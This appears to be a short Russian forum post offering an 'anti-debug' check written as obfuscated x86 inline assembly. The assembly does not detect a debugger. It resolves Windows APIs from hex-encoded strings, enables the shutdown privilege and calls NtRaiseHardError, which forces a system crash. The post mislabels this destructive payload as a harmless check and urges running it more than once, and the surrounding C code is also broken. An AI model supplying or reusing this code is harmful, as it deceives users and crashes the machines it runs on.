Как использовать пример есть.
Делайте проверку не 1 раз
Делайте проверку не 1 раз
Код:
bool Anti_debug() {
__asm {
push ebp
mov ebp, esp
sub esp, 0x18
push ebx
push esi
mov DWORD PTR[ebp - 0x18], 0x0
mov DWORD PTR[ebp - 0xc], 0x0
xor ecx, ecx
mov eax, fs:[ecx + 0x30]
mov eax, [eax + 0xc]
mov esi, [eax + 0x14]
lodsd
xchg eax, esi
lodsd
mov ebx, [eax + 0x10]
mov edx, [ebx + 0x3c]
add edx, ebx
mov edx, [edx + 0x78]
add edx, ebx
mov esi, [edx + 0x20]
add esi, ebx
xor ecx, ecx
Find_debugger:
inc ecx
lodsd
add eax, ebx
cmp dword ptr[eax], 0x50746547
jnz Find_debugger
cmp dword ptr[eax + 0x4], 0x41636f72
jnz Find_debugger
cmp dword ptr[eax + 0x8], 0x65726464
jnz Find_debugger
mov esi, [edx + 0x24]
add esi, ebx
mov cx, [esi + ecx * 2]
dec ecx
mov esi, [edx + 0x1c]
add esi, ebx
mov edx, [esi + ecx * 4]
add edx, ebx
xor ecx, ecx
push ebx
push edx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ebx
call edx
add esp, 0xc
pop ecx
push eax
xor eax, eax
mov al, 0x6c
push eax
push 0x6c642e6c
push 0x6c64746e
push esp
call DWORD PTR[esp + 0x10]
add esp, 0xc
push eax
xor eax, eax
mov ax, 0x6567
push eax
push 0x656c6976
push 0x69725074
push 0x73756a64
push 0x416c7452
push esp
push DWORD PTR[esp + 0x18]
call DWORD PTR[esp + 0x24]
add esp, 0x14
mov DWORD PTR[ebp - 0x18], eax
push eax
xor eax, eax
push eax
push 0x726f7272
push 0x45647261
push 0x48657369
push 0x6152744e
push esp
push DWORD PTR[esp + 0x1c]
call DWORD PTR[esp + 0x28]
add esp, 0x14
mov DWORD PTR[ebp - 0xc], eax
push eax
mov eax, DWORD PTR[ebp - 0x18]
mov DWORD PTR[ebp - 0x10], eax
mov ecx, DWORD PTR[ebp - 0xc]
mov DWORD PTR[ebp - 0x8], ecx
lea edx, [ebp - 0x1]
push edx
push 0x0
push 0x1
push 0x13
call DWORD PTR[ebp - 0x10]
lea eax, [ebp - 0x14]
push eax
push 0x6
push 0x0
push 0x0
push 0x0
push 0xc0000420
call DWORD PTR[ebp - 0x8]
call DWORD PTR[esp - 0x32]
pop esi
pop ebx
mov esp, ebp
pop ebp
ret
}
}
int main() {
is_debugged = false;
if(Anti_debug() == 1) is_debugged = true;
}
